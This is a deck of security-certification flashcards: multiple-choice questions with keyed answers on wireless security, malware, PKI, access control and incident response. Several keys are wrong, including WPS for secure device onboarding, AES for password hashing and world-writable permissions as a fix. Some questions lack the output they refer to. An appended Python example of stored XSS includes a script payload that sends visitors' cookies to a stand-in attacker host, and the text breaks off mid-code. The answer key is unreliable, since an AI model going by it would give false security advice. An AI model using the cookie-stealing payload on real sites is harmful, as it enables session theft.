100 questions v1.pdf Flashcards

1
Q

A systems administrator needs to integrate multiple IoT and small embedded devices into the company’s wireless network securely. Which of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?

A. WPS

B. WPA

C. EAP-FAST

D. 802.1X

A

A. WPS

2
Q

When backing up a database server to LTO tape drives, the following backup schedule is used. Backups take
one hour to complete:

On Friday at 9:00 p.m., there is a RAID failure on the database server. The data must be restored from
backup. Which of the following is the number of backup tapes that will be needed to complete this operation?
A. 1
B. 2
C. 3
D. 4
E. 6

A

D. 4

3
Q

Management wants to ensure any sensitive data on company-provided cell phones is isolated in a single location that can be remotely wiped if the phone is lost. Which of the following technologies BEST meets this need?
A. Geofencing
B. Containerization
C. Device encryption
D. Sandboxing

A

B. Containerization

4
Q

A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and
moving all heavy applications and storage to a centralized server that hosts all of the company’s required
desktop applications. Which of the following describes the BEST deployment method to meet these
requirements?
A. IaaS
B. VM sprawl
C. VDI
D. PaaS

A

C. VDI

5
Q

Joe, a user, reports to the help desk that he can no longer access any documents on his PC. He states that he saw a window appear on the screen earlier, but he closed it without reading it. Upon investigation, the technician sees high disk activity on Joe’s PC. Which of the following types of malware is MOST likely indicated by these findings?

A. Keylogger
B. Trojan
C. Rootkit
D. Crypto-malware

A

D. Crypto-malware

6
Q

An administrator is implementing a secure web server and wants to ensure that if the web server application is compromised, the application does not have access to other parts of the server or network. Which of the following should the administrator implement? (Choose two.)
A. Mandatory access control
B. Discretionary access control
C. Rule-based access control
D. Role-based access control
E. Attribute-based access control

A

A. Mandatory access control

C. Rule-based access control

7
Q

A developer has incorporated routines into the source code for controlling the length of the input passed to the
program. Which of the following types of vulnerabilities is the developer protecting the code against?
A. DLL injection
B. Memory leak
C. Buffer overflow
D. Pointer dereference

A

C. Buffer overflow

8
Q

An application developer has neglected to include input validation checks in the design of the company’s new
web application. An employee discovers that repeatedly submitting large amounts of data, including custom
code, to an application will allow the execution of the custom code at the administrator level. Which of the
following BEST identifies this application attack?
A. Cross-site scripting
B. Clickjacking
C. Buffer overflow
D. Replay

A

C. Buffer overflow

9
Q

Which of the following identity access methods creates a cookie on the first login to a central authority to allow
logins to subsequent applications without re-entering credentials?
A. Multifactor authentication
B. Transitive trust
C. Federated access
D. Single sign-on

A

D. Single sign-on

10
Q

A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?
A. Implementing a site-to-site VPN for server access.
B. Implementing a DMZ segment for the server.
C. Implementing NAT addressing for the servers.
D. Implementing a sandbox to contain the servers.

A

B. Implementing a DMZ segment for the server.

11
Q

When used together, which of the following qualify as two-factor authentication?
A. Password and PIN
B. Smart card and PIN
C. Proximity card and smart card
D. Fingerprint scanner and iris scanner

A

B. Smart card and PIN

12
Q

Ann, a new employee, received an email from an unknown source indicating she needed to click on the
provided link to update her company’s profile. Once Ann clicked the link, a command prompt appeared with
the following output:

Which of the following types of malware was executed?
A. Ransomware
B. Adware
C. Spyware
D. Virus

A

A. Ransomware

13
Q

A company has a team of penetration testers. This team has located a file on the company file server that they
believe contains cleartext usernames followed by a hash. Which of the following tools should the penetration
testers use to learn more about the content of this file?
A. Exploitation framework
B. Vulnerability scanner
C. Netcat
D. Password cracker

A

D. Password cracker

14
Q

The Chief Information Security Officer (CISO) in a company is working to maximize protection efforts of
sensitive corporate data. The CISO implements a “100% shred” policy within the organization, with the intent
to destroy any documentation that is not actively in use in a way that it cannot be recovered or reassembled.
Which of the following attacks is this deterrent MOST likely to mitigate?
A. Dumpster diving
B. Whaling
C. Shoulder surfing
D. Vishing

A

A. Dumpster diving

15
Q

A Chief Information Security Officer (CISO) has instructed the information assurance staff to act upon a fast-spreading virus.
Which of the following steps in the incident response process should be taken NEXT?
A. Identification
B. Eradication
C. Escalation
D. Containment

A

A. Identification

16
Q

An organization has air gapped a critical system.
Which of the following BEST describes the type of attacks that are prevented by this security measure?
A. Attacks from another local network segment
B. Attacks exploiting USB drives and removable media
C. Attacks that spy on leaked emanations or signals
D. Attacks that involve physical intrusion or theft

A

A. Attacks from another local network segment

17
Q

An organization wants to ensure network access is granted only after a user or device has been authenticated.
Which of the following should be used to achieve this objective for both wired and wireless networks?
A. CCMP
B. PKCS#12
C. IEEE 802.1X
D. OCSP

A

C. IEEE 802.1X

18
Q

A security administrator is choosing an algorithm to generate password hashes.
Which of the following would offer the BEST protection against offline brute force attacks?
A. MD5
B. 3DES
C. AES
D. SHA-1

A

C. AES

19
Q

A security administrator is investigating many recent incidents of credential theft for users accessing the
company’s website, despite the hosting web server requiring HTTPS for access. The server’s logs show the
website leverages the HTTP POST method for carrying user authentication details.
Which of the following is the MOST likely reason for compromise?
A. The HTTP POST method is not protected by HTTPS.
B. The web server is running a vulnerable SSL configuration.
C. The HTTP response is susceptible to sniffing.
D. The company doesn’t support DNSSEC.

A

A. The HTTP POST method is not protected by HTTPS.

20
Q

A user from the financial aid office is having trouble interacting with the finaid directory on the university’s ERP
system. The systems administrator who took the call ran a command and received the following output:
Subsequently, the systems administrator has also confirmed the user is a member of the finaid group on the
ERP system.
Which of the following is the MOST likely reason for the issue?
A. The permissions on the finaid directory should be drwxrwxrwx.
B. The problem is local to the user, and the user should reboot the machine.
C. The files on the finaid directory have become corrupted.
D. The finaid directory is not formatted correctly.

A

A. The permissions on the finaid directory should be drwxrwxrwx.

21
Q

An organization wants to deliver streaming audio and video from its home office to remote locations all over
the world. It wants the stream to be delivered securely and protected from intercept and replay attacks.
Which of the following protocols is BEST suited for this purpose?
A. SSH
B. SIP
C. S/MIME
D. SRTP

A

D. SRTP

22
Q

A manager makes an unannounced visit to the marketing department and performs a walk-through of the
office. The manager observes unclaimed documents on printers. A closer look at these documents reveals
employee names, addresses, ages, birth dates, marital/dependent statuses, and favorite ice cream flavors.
The manager brings this to the attention of the marketing department head. The manager believes this
information to be PII, but the marketing head does not agree. Having reached a stalemate, which of the
following is the MOST appropriate action to take NEXT?
A. Elevate to the Chief Executive Officer (CEO) for redress; change from the top down usually succeeds.
B. Find the privacy officer in the organization and let the officer act as the arbiter.
C. Notify employees whose names are on these files that their personal information is being compromised.
D. To maintain a working relationship with marketing, quietly record the incident in the risk register.

A

B. Find the privacy officer in the organization and let the officer act as the arbiter.

23
Q

A security administrator is implementing a secure method that allows developers to place files or objects onto
a Linux server. Developers are required to log in using a username, password, and asymmetric key.
Which of the following protocols should be implemented?
A. SSL/TLS
B. SFTP
C. SRTP
D. IPSec

A

B. SFTP

24
Q

Which of the following BEST describes the purpose of authorization?
A. Authorization provides logging to a resource and comes after authentication.
B. Authorization provides authentication to a resource and comes after identification.
C. Authorization provides identification to a resource and comes after authentication.
D. Authorization provides permissions to a resource and comes after authentication.

A

D. Authorization provides permissions to a resource and comes after authentication.

25
Q

A security analyst is emailing PII in a spreadsheet file to an audit validator for after-actions related to a security
assessment. The analyst must make sure the PII data is protected with the following minimum requirements:
Ensure confidentiality at rest.
Ensure the integrity of the original email message.
Which of the following controls would ensure these data security requirements are carried out?
A. Encrypt and sign the email using S/MIME.
B. Encrypt the email and send it using TLS.
C. Hash the email using SHA-1.
D. Sign the email using MD5.

A

A. Encrypt and sign the email using S/MIME.

26
Q

The network information for a workstation is as follows:
When the workstation’s user attempts to access www.example.com, the URL that actually opens is
www.notexample.com. The user successfully connects to several other legitimate URLs. Which of the
following have MOST likely occurred? (Choose two.)
A. ARP poisoning
B. Buffer overflow
C. DNS poisoning
D. Domain hijacking
E. IP spoofing

A

C. DNS poisoning
D. Domain hijacking

27
Q

Which of the following implements a stream cipher?
A. File-level encryption
B. IKEv2 exchange
C. SFTP data transfer
D. S/MIME encryption

A

D. S/MIME encryption

28
Q

A security technician has been assigned data destruction duties. The hard drives that are being disposed of
contain highly sensitive information. Which of the following data destruction techniques is MOST appropriate?
A. Degaussing
B. Purging
C. Wiping
D. Shredding

A

D. Shredding

29
Q

Which of the following BEST explains how the use of configuration templates reduces organization risk?
A. It ensures consistency of configuration for initial system implementation.
B. It enables system rollback to a last known-good state if patches break functionality.
C. It facilitates fault tolerance since applications can be migrated across templates.
D. It improves vulnerability scanning efficiency across multiple systems.

A

A. It ensures consistency of configuration for initial system implementation.

30
Q

A Chief Information Security Officer (CISO) is performing a BIA for the organization in case of a natural disaster. Which of the following should be at the top of the CISO’s list?

A. Identify redundant and high-availability systems.
B. Identify mission-critical applications and systems.
C. Identify the single point of failure in the system.
D. Identify the impact on safety of the property.

A

B. Identify mission-critical applications and systems.

31
Q

Which of the following should a technician use to protect a cellular phone that is needed for an investigation, to
ensure the data will not be removed remotely?
A. Air gap
B. Secure cabinet
C. Faraday cage
D. Safe

A

C. Faraday cage

32
Q

Which of the following is the MOST significant difference between intrusive and non-intrusive vulnerability
scanning?
A. One uses credentials, but the other does not.
B. One has a higher potential for disrupting system operations.
C. One allows systems to activate firewall countermeasures.
D. One returns service banners, including running versions.

A

B. One has a higher potential for disrupting system operations.

33
Q

While reviewing system logs, a security analyst notices that a large number of end users are changing their
passwords four times on the day the passwords are set to expire. The analyst suspects they are cycling their
passwords to circumvent current password controls. Which of the following would provide a technical control
to prevent this activity from occurring?
A. Set password aging requirements.
B. Increase the password history from three to five.
C. Create an AUP that prohibits password reuse.
D. Implement password complexity requirements.

A

A. Set password aging requirements.

34
Q

A security analyst is running a credential-based vulnerability scanner on a Windows host. The vulnerability scanner is using the protocol NetBIOS over TCP/IP to connect to various systems. However, the scan does not return any results. To address the issue, the analyst should ensure that which of the following default ports is open on systems?

A. 135

B. 137

C. 3389

D. 5060

A

B. 137

35
Q

An organization’s research department uses workstations in an air-gapped network. A competitor released products based on files that originated in the research department. Which of the following should management do to improve the security and confidentiality of the research files?

A. Implement multifactor authentication on the workstations.

B. Configure removable media controls on the workstations.

C. Install a web application firewall in the research department.

D. Install HIDS on each of the research workstations.

A

B. Configure removable media controls on the workstations.

36
Q

A company network is currently under attack. Although security controls are in place to stop the attack, the security administrator needs more information about the types of attacks being used. Which of the following network types would BEST help the administrator gather this information?

A. DMZ

B. Guest network

C. Ad hoc

D. Honeynet

A

D. Honeynet

37
Q

Moving laterally within a network once an initial exploit is used to gain persistent access for the purpose of establishing further control of a system is known as:

A. pivoting.

B. persistence.

C. active reconnaissance.

D. a backdoor.

A

A. pivoting.

38
Q

A systems administrator is increasing the security settings on a virtual host to ensure users on one VM cannot access information from another VM. Which of the following is the administrator protecting against?

A. VM sprawl

B. VM escape

C. VM migration

D. VM sandboxing

A

B. VM escape

39
Q

A network administrator is implementing multifactor authentication for employees who travel and use company
devices remotely by using the company VPN. Which of the following would provide the required level of
authentication?
A. 802.1X and OTP
B. Fingerprint scanner and voice recognition
C. RBAC and PIN
D. Username/Password and TOTP

A

A. 802.1X and OTP

40
Q

Which of the following encryption algorithms require one encryption key? (Choose two.)
A. MD5
B. 3DES
C. BCRYPT
D. RC4
E. DSA

A

B. 3DES

D. RC4

41
Q

A preventive control differs from a compensating control in that a preventive control is:
A. put in place to mitigate a weakness in a user control.
B. deployed to supplement an existing control that is EOL.
C. relied on to address gaps in the existing control structure.
D. designed to specifically mitigate a risk.

A

C. relied on to address gaps in the existing control structure.

42
Q

A systems administrator has installed a new UTM that is capable of inspecting SSL/TLS traffic for malicious
payloads. All inbound network traffic coming from the Internet and terminating on the company’s secure web
servers must be inspected. Which of the following configurations would BEST support this requirement?
A. The web servers’ CA full certificate chain must be installed on the UTM.
B. The UTM certificate pair must be installed on the web servers.
C. The web servers’ private certificate must be installed on the UTM.
D. The UTM and web servers must use the same certificate authority.

A

A. The web servers’ CA full certificate chain must be installed on the UTM.

43
Q

A security administrator receives alerts from the perimeter UTM. Upon checking the logs, the administrator
finds the following output:
Time: 12/25 0300
From Zone: Untrust
To Zone: DMZ
Attacker: externalip.com
Victim: 172.16.0.20
To Port: 80
Action: Alert
Severity: Critical
When examining the PCAP associated with the event, the security administrator finds the following
information:

alert("Click here for important information regarding your account! http://externalip.com/account.php");

Which of the following actions should the security administrator take?
A. Upload the PCAP to the IDS in order to generate a blocking signature to block the traffic.
B. Manually copy the data from the PCAP file and generate a blocking signature in the HIDS to block the traffic for future events.
C. Implement a host-based firewall rule to block future events of this type from occurring.
D. Submit a change request to modify the XSS vulnerability signature to TCP reset on future attempts.

A

B. Manually copy the data from the PCAP file and generate a blocking signature in the HIDS to block the traffic for future events.

44
Q

Given the information below:
MD5HASH document.doc 049eab40fd36caadlfab10b3cdf4a883
MD5HASH image.jpg 049eab40fd36caadlfab10b3cdf4a883
Which of the following concepts are described above? (Choose two.)
A. Salting
B. Collision
C. Steganography
D. Hashing
E. Key stretching

A

B. Collision
D. Hashing

45
Q

An organization wishes to allow its users to select devices for business use but does not want to overwhelm
the service desk with requests for too many different device types and models. Which of the following
deployment models should the organization use to BEST meet these requirements?
A. VDI environment
B. CYOD model
C. DAC model
D. BYOD model

A

B. CYOD model

46
Q

A state-sponsored threat actor has launched several successful attacks against a corporate network. Although
the target has a robust patch management program in place, the attacks continue in depth and scope, and the
security department has no idea how the attacks are able to gain access. Given that patch management and
vulnerability scanners are being used, which of the following would be used to analyze the attack
methodology?
A. Rogue system detection
B. Honeypots
C. Next-generation firewall
D. Penetration test

A

B. Honeypots

47
Q

A technician, who is managing a secure B2B connection, noticed the connection broke last night. All
networking equipment and media are functioning as expected, which leads the technician to question certain
PKI components. Which of the following should the technician use to validate this assumption? (Choose two.)
A. PEM
B. CER
C. SCEP
D. CRL
E. OCSP
F. PFX

A

D. CRL
E. OCSP

48
Q

A security administrator is investigating a report that a user is receiving suspicious emails. The user’s machine
has an old functioning modem installed. Which of the following security concerns need to be identified and
mitigated? (Choose two.)
A. Vishing
B. Whaling
C. Spear phishing
D. Pharming
E. War dialing
F. Hoaxing

A

C. Spear phishing
E. War dialing

49
Q

Which of the following provides PFS?
A. AES
B. RC4
C. DHE
D. HMAC

A

C. DHE

50
Q

A Chief Information Officer (CIO) is concerned that encryption keys might be exfiltrated by a contractor. The
CIO wants to keep control over key visibility and management. Which of the following would be the BEST
solution for the CIO to implement?
A. HSM
B. CA
C. SSH
D. SSL

A

A. HSM

51
Q

A company recently implemented a new security system. In the course of configuration, the security
administrator adds the following entry:
#Whitelist
USB\VID_13FE&PID_4127&REV_0100
Which of the following security technologies is MOST likely being configured?
A. Application whitelisting
B. HIDS
C. Data execution prevention
D. Removable media control

A

D. Removable media control

52
Q

A penetration tester is checking to see if an internal system is vulnerable to an attack using a remote listener.
Which of the following commands should the penetration tester use to verify if this vulnerability exists?
(Choose two.)
A. tcpdump
B. nc
C. nmap
D. nslookup
E. tail
F. tracert

A

B. nc
C. nmap

53
Q

Which of the following is MOST likely caused by improper input handling?
A. Loss of database tables
B. Untrusted certificate warning
C. Power off reboot loop
D. Breach of firewall ACLs

A

A. Loss of database tables

54
Q

A security administrator is investigating a possible account compromise. The administrator logs onto a desktop
computer, executes the command notepad.exe c:\Temp\qkakforlkgfkja.1og, and reviews the following:
Lee,\rI have completed the task that was assigned to me\rrespectfully\rJohn\r
https://www.portal.com\rjohnuser\rilovemycat2
Given the above output, which of the following is the MOST likely cause of this compromise?
A. Virus
B. Worm
C. Rootkit
D. Keylogger

A

D. Keylogger

55
Q

Which of the following command line tools would be BEST to identify the services running in a server?
A. Traceroute
B. Nslookup
C. Ipconfig
D. Netstat

A

D. Netstat

56
Q

A security administrator needs to conduct a full inventory of all encryption protocols and cipher suites. Which
of the following tools will the security administrator use to conduct this inventory MOST efficiently?
A. tcpdump
B. Protocol analyzer
C. Netstat
D. Nmap

A

D. Nmap

57
Q

A systems developer needs to provide machine-to-machine interface between an application and a database
server in the production environment. This interface will exchange data once per day. Which of the following
access control account practices would BEST be used in this situation?
A. Establish a privileged interface group and apply read-write permission to the members of that group.
B. Submit a request for account privilege escalation when the data needs to be transferred.
C. Install the application and database on the same server and add the interface to the local administrator
group.
D. Use a service account and prohibit users from accessing this account for development work.

A

D. Use a service account and prohibit users from accessing this account for development work.

58
Q

Which of the following is unique to a stream cipher?

A. It encrypts 128 bytes at a time.
B. It uses AES encryption.
C. It performs bit-level encryption.
D. It is used in HTTPS.

A

C. It performs bit-level encryption.

59
Q

Which of the following is an example of federated access management?
A. Windows passing user credentials on a peer-to-peer network
B. Applying a new user account with a complex password
C. Implementing a AAA framework for network access
D. Using a popular website login to provide access to another website

A

D. Using a popular website login to provide access to another website

60
Q

A security analyst wishes to scan the network to view potentially vulnerable systems the way an attacker
would. Which of the following would BEST enable the analyst to complete the objective?
A. Perform a non-credentialed scan.
B. Conduct an intrusive scan.
C. Attempt escalation of privilege.
D. Execute a credentialed scan.

A

A. Perform a non-credentialed scan.

61
Q

A company moved into a new building next to a sugar mill. Cracks have been discovered in the walls of the
server room, which is located on the same side as the sugar mill loading docks. The cracks are believed to
have been caused by heavy trucks. Moisture has begun to seep into the server room, causing extreme
humidification problems and equipment failure. Which of the following BEST describes the type of threat the
organization faces?
A. Foundational
B. Man-made
C. Environmental
D. Natural

A

A. Foundational

62
Q

The president of a company that specializes in military contracts receives a request for an interview. During
the interview, the reporter seems more interested in discussing the president’s family life and personal history
than the details of a recent company success. Which of the following security concerns is this MOST likely an
example of?
A. Insider threat
B. Social engineering
C. Passive reconnaissance
D. Phishing

A

B. Social engineering

63
Q

A Chief Information Security Officer (CISO) for a school district wants to enable SSL to protect all of the public-facing servers in the domain. Which of the following is a secure solution that is the MOST cost effective?
A. Create and install a self-signed certificate on each of the servers in the domain.
B. Purchase a load balancer and install a single certificate on the load balancer.
C. Purchase a wildcard certificate and implement it on every server.
D. Purchase individual certificates and apply them to the individual servers.

A

A. Create and install a self-signed certificate on each of the servers in the domain.

64
Q

A company is experiencing an increasing number of systems that are locking up on Windows startup. The
security analyst clones a machine, enters into safe mode, and discovers a file in the startup process that runs
Wstart.bat.
@echo off
:asdhbawdhbasdhbawdhb
start notepad.exe
start notepad.exe
start calculator.exe
start calculator.exe
goto asdhbawdhbasdhbawdhb
Given the file contents and the system’s issues, which of the following types of malware is present?
A. Rootkit
B. Logic bomb
C. Worm
D. Virus

A

B. Logic bomb

65
Q

A government organization recently contacted three different vendors to obtain cost quotes for a desktop PC
refresh. The quote from one of the vendors was significantly lower than the other two and was selected for the
purchase. When the PCs arrived, a technician determined some NICs had been tampered with. Which of the
following MOST accurately describes the security risk presented in this situation?
A. Hardware root of trust
B. UEFI
C. Supply chain
D. TPM
E. Crypto-malware
F. ARP poisoning

A

C. Supply chain

66
Q

A company is examining possible locations for a hot site. Which of the following considerations is of MOST
concern if the replication technology being used is highly sensitive to network latency?
A. Connection to multiple power substations
B. Location proximity to the production site
C. Ability to create separate caged space
D. Positioning of the site across international borders

A

B. Location proximity to the production site

67
Q

An attacker has gathered information about a company employee by obtaining publicly available information
from the Internet and social networks. Which of the following types of activity is the attacker performing?
A. Pivoting
B. Exfiltration of data
C. Social engineering
D. Passive reconnaissance

A

D. Passive reconnaissance

68
Q

An organization needs to integrate with a third-party cloud application. The organization has 15000 users and
does not want to allow the cloud provider to query its LDAP authentication server directly. Which of the
following is the BEST way for the organization to integrate with the cloud application?
A. Upload a separate list of users and passwords with a batch import.
B. Distribute hardware tokens to the users for authentication to the cloud.
C. Implement SAML with the organization’s server acting as the identity provider.
D. Configure a RADIUS federation between the organization and the cloud provider.

A

C. Implement SAML with the organization’s server acting as the identity provider.

69
Q

Which of the following is a security consideration for IoT devices?
A. IoT devices have built-in accounts that users rarely access.
B. IoT devices have less processing capabilities.
C. IoT devices are physically segmented from each other.
D. IoT devices have purpose-built applications.

A

A. IoT devices have built-in accounts that users rarely access.

70
Q

The Chief Information Officer (CIO) has determined the company’s new PKI will not use OCSP. The purpose
of OCSP still needs to be addressed. Which of the following should be implemented?
A. Build an online intermediate CA.
B. Implement a key escrow.
C. Implement stapling.
D. Install a CRL.

A

D. Install a CRL.

71
Q

A healthcare company is revamping its IT strategy in light of recent regulations. The company is concerned
about compliance and wants to use a pay-per-use model. Which of the following is the BEST solution?
A. On-premises hosting
B. Community cloud
C. Hosted infrastructure
D. Public SaaS

A

D. Public SaaS

72
Q

An organization’s policy requires users to create passwords with an uppercase letter, lowercase letter,
number, and symbol. This policy is enforced with technical controls, which also prevents users from using any
of their previous 12 passwords. The organization does not use single sign-on, nor does it centralize storage of
passwords.
The incident response team recently discovered that passwords for one system were compromised.
Passwords for a completely separate system have NOT been compromised, but unusual login activity has
been detected for that separate system. Account login has been detected for users who are on vacation.
Which of the following BEST describes what is happening?
A. Some users are meeting password complexity requirements but not password length requirements.
B. The password history enforcement is insufficient, and old passwords are still valid across many different
systems.
C. Some users are reusing passwords, and some of the compromised passwords are valid on multiple
systems.
D. The compromised password file has been brute-force hacked, and the complexity requirements are not
adequate to mitigate this risk.

A

C. Some users are reusing passwords, and some of the compromised passwords are valid on multiple
systems.
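
The scenario above turns on one check an incident response team would actually run: are the plaintexts recovered from the breached system valid on the untouched system? The following is an added example, not part of the deck. It assumes the second system stores salted PBKDF2 hashes (a constructed store built in the script) and that the team already has the recovered plaintexts; all usernames and passwords are made up.

```python
import hashlib
import hmac
import os
import string
from typing import Dict, List, Tuple

# Constructed sample data. COMPROMISED is what the IR team recovered from the
# breached system (username -> plaintext). SEPARATE_SYSTEM_PASSWORDS is used
# only to build a realistic salted-hash store for the second system; in a real
# investigation you would have the store, not the plaintexts.
COMPROMISED: Dict[str, str] = {
    "alice": "Summer!2023",
    "bob": "Tr0ub4dor&3",
    "carol": "Xk9#pL2mQ!",
    "dave": "Winter$2024",
}
SEPARATE_SYSTEM_PASSWORDS: Dict[str, str] = {
    "alice": "Summer!2023",    # reused across systems
    "bob": "Different#Pass1",  # unique to this system
    "carol": "Xk9#pL2mQ!",     # reused across systems
    "erin": "Not&Leaked9",     # no account on the breached system
}


def meets_policy(password: str) -> bool:
    """The policy from the card: upper, lower, digit and symbol all present."""
    return (any(c.isupper() for c in password)
            and any(c.islower() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in string.punctuation for c in password))


def hash_password(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    """Salted PBKDF2-HMAC-SHA256, the storage format the second system is assumed to use."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)


def build_store(plaintexts: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    """username -> (salt, hash); per-user random salts, so equal passwords hash differently."""
    store: Dict[str, Tuple[bytes, bytes]] = {}
    for user, pw in plaintexts.items():
        salt = os.urandom(16)
        store[user] = (salt, hash_password(pw, salt))
    return store


def find_reused(compromised: Dict[str, str],
                store: Dict[str, Tuple[bytes, bytes]]) -> List[str]:
    """Users whose password from the breached system also verifies on the second system."""
    reused = []
    for user, (salt, stored_hash) in store.items():
        candidate = compromised.get(user)
        if candidate is None:
            continue  # no matching account on the breached system
        if hmac.compare_digest(hash_password(candidate, salt), stored_hash):
            reused.append(user)
    return sorted(reused)


SEPARATE_SYSTEM_STORE = build_store(SEPARATE_SYSTEM_PASSWORDS)

if __name__ == "__main__":
    print("all compromised passwords meet the complexity policy:",
          all(meets_policy(p) for p in COMPROMISED.values()))
    print("accounts to force-reset on the second system:",
          find_reused(COMPROMISED, SEPARATE_SYSTEM_STORE))
```

Every compromised password satisfies the complexity rule, and the second system's hashes were never exposed, yet two accounts are still open to the attacker: complexity and history controls say nothing about reuse between independent systems. The output of `find_reused` is the reset list; the vacation logins in the card would be the confirmation.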

73
Q

Which of the following represents a multifactor authentication system?
A. An iris scanner coupled with a palm print reader and fingerprint scanner with liveness detection.
B. A secret passcode that prompts the user to enter a secret key if entered correctly.
C. A digital certificate on a physical token that is unlocked with a secret passcode.
D. A one-time password token combined with a proximity badge.

A

C. A digital certificate on a physical token that is unlocked with a secret passcode.

74
Q

A company recently installed fingerprint scanners at all entrances to increase the facility’s security. The
scanners were installed on Monday morning, and by the end of the week it was determined that 1.5% of valid
users were denied entry. Which of the following measurements do these users fall under?
A. FRR
B. FAR
C. CER
D. SLA

A

A. FRR

75
Q

An attacker has obtained the user ID and password of a datacenter’s backup operator and has gained access
to a production system. Which of the following would be the attacker’s NEXT action?
A. Perform a passive reconnaissance of the network.
B. Initiate a confidential data exfiltration process.
C. Look for known vulnerabilities to escalate privileges.
D. Create an alternate user ID to maintain persistent access.

A

B. Initiate a confidential data exfiltration process.

76
Q

An organization’s IRP prioritizes containment over eradication. An incident has been discovered where an
attacker outside of the organization has installed cryptocurrency mining software on the organization’s web
servers. Given the organization’s stated priorities, which of the following would be the NEXT step?
A. Remove the affected servers from the network.
B. Review firewall and IDS logs to identify possible source IPs.
C. Identify and apply any missing operating system and software patches.
D. Delete the malicious software and determine if the servers must be reimaged.

A

A. Remove the affected servers from the network.

77
Q

During a security audit of a company’s network, unsecure protocols were found to be in use. A network administrator wants to ensure browser-based access to company switches is using the most secure protocol.
Which of the following protocols should be implemented?
A. SSH2
B. TLS1.2
C. SSL1.3
D. SNMPv3

A

B. TLS1.2

78
Q

While monitoring the SIEM, a security analyst observes traffic from an external IP to an IP address of the
business network on port 443. Which of the following protocols would MOST likely cause this traffic?
A. HTTP
B. SSH
C. SSL
D. DNS

A

C. SSL

79
Q

A technician is required to configure updates on a guest operating system while maintaining the ability to
quickly revert the changes that were made while testing the updates. Which of the following should the
technician implement?
A. Snapshots
B. Revert to known state
C. Rollback to known configuration
D. Shadow copy

A

A. Snapshots

80
Q

A technician is investigating a report of unusual behavior and slow performance on a company-owned laptop.
The technician runs a command and reviews the following information:
Based on the above information, which of the following types of malware should the technician report?
A. Spyware
B. Rootkit
C. RAT
D. Logic bomb

A

C. RAT

81
Q

An organization is building a new customer services team, and the manager needs to keep the team focused
on customer issues and minimize distractions. The users have a specific set of tools installed, which they must
use to perform their duties. Other tools are not permitted for compliance and tracking purposes. Team
members have access to the Internet for product lookups and to research customer issues. Which of the
following should a security engineer employ to fulfill the requirements for the manager?
A. Install a web application firewall.
B. Install HIPS on the team’s workstations.
C. Implement containerization on the workstations.
D. Configure whitelisting for the team.

A

D. Configure whitelisting for the team.

82
Q

An administrator is disposing of media that contains sensitive information. Which of the following will provide
the MOST effective method to dispose of the media while ensuring the data will be unrecoverable?
A. Wipe the hard drive.
B. Shred the hard drive.
C. Sanitize all of the data.
D. Degauss the hard drive.

A

B. Shred the hard drive.

83
Q

Which of the following is the MOST likely motivation for a script kiddie threat actor?
A. Financial gain
B. Notoriety
C. Political expression
D. Corporate espionage

A

B. Notoriety

84
Q

After discovering a security incident and removing the affected files, an administrator disabled an unneeded
service that led to the breach. Which of the following steps in the incident response process has the
administrator just completed?
A. Containment
B. Eradication
C. Recovery
D. Identification

A

B. Eradication

85
Q

A company employee recently retired, and there was a schedule delay because no one was capable of filling
the employee’s position. Which of the following practices would BEST help to prevent this situation in the
future?
A. Mandatory vacation
B. Separation of duties
C. Job rotation
D. Exit interviews

A

C. Job rotation

86
Q

A security analyst is interested in setting up an IDS to monitor the company network. The analyst has been
told there can be no network downtime to implement the solution, but the IDS must capture all of the network
traffic. Which of the following should be used for the IDS implementation?
A. Network tap
B. Honeypot
C. Aggregation
D. Port mirror

A

A. Network tap

87
Q

A contracting company recently completed its period of performance on a government contract and would like
to destroy all information associated with contract performance. Which of the following is the best NEXT step
for the company to take?
A. Consult data disposition policies in the contract.
B. Use a pulper or pulverizer for data destruction.
C. Retain the data for a period no more than one year.
D. Burn hard copies containing PII or PHI

A

A. Consult data disposition policies in the contract.

88
Q

A systems administrator is receiving multiple alerts from the company NIPS. A review of the NIPS logs shows
the following:
reset both: 70.32.200.2:3194 –> 10.4.100.4:80 buffer overflow attempt
reset both: 70.32.200.2:3230 –> 10.4.100.4:80 directory traversal attack
reset client: 70.32.200.2:4019 –> 10.4.100.4:80 Blind SQL injection attack
Which of the following should the systems administrator report back to management?
A. The company web server was attacked by an external source, and the NIPS blocked the attack.
B. The company web and SQL servers suffered a DoS caused by a misconfiguration of the NIPS.
C. An external attacker was able to compromise the SQL server using a vulnerable web application.
D. The NIPS should move from an inline mode to an out-of-band mode to reduce network latency.

A

A. The company web server was attacked by an external source, and the NIPS blocked the attack.

89
Q

Which of the following BEST distinguishes Agile development from other methodologies in terms of vulnerability management?
A. Cross-functional teams
B. Rapid deployments
C. Daily standups
D. Peer review
E. Creating user stories

A

B. Rapid deployments

90
Q

An organization is concerned about video emissions from users’ desktops. Which of the following is the BEST
solution to implement?
A. Screen filters
B. Shielded cables
C. Spectrum analyzers
D. Infrared detection

A

B. Shielded cables

91
Q

A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a
web forum, which was recently involved in a security breach:



Given the line of code above, which of the following BEST represents the attack performed during the breach?
A. CSRF
B. DDoS
C. DoS
D. XSS

A

D. XSS
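
The card's JavaScript is not reproduced on the page, but the attack class is stored XSS: script posted into a comment field is later served to every visitor. The following is an added example, not the deck's code, showing the vulnerable rendering next to the escaped one and a triage check for stored comments. The payload and the host name `attacker.example` are constructed.

```python
import html
import re
from typing import List

# Constructed payload of the kind posted into a forum comment field: it loads an
# image from an attacker-controlled (hypothetical) host with the visitor's
# cookie in the query string.
PAYLOAD = ('<script>new Image().src="https://attacker.example/c?"'
           '+document.cookie</script>')

COMMENT_TEMPLATE = '<div class="comment"><p>{body}</p></div>'


def render_vulnerable(comment: str) -> str:
    """Interpolates the stored comment into the page verbatim: stored XSS."""
    return COMMENT_TEMPLATE.format(body=comment)


def render_safe(comment: str) -> str:
    """HTML-entity-escapes the comment so the browser treats it as text, not markup."""
    return COMMENT_TEMPLATE.format(body=html.escape(comment, quote=True))


# Patterns indicating active content that survived into the rendered HTML body.
ACTIVE_MARKUP = re.compile(
    r"<\s*script\b"        # script element
    r"|<\s*iframe\b"       # framed content
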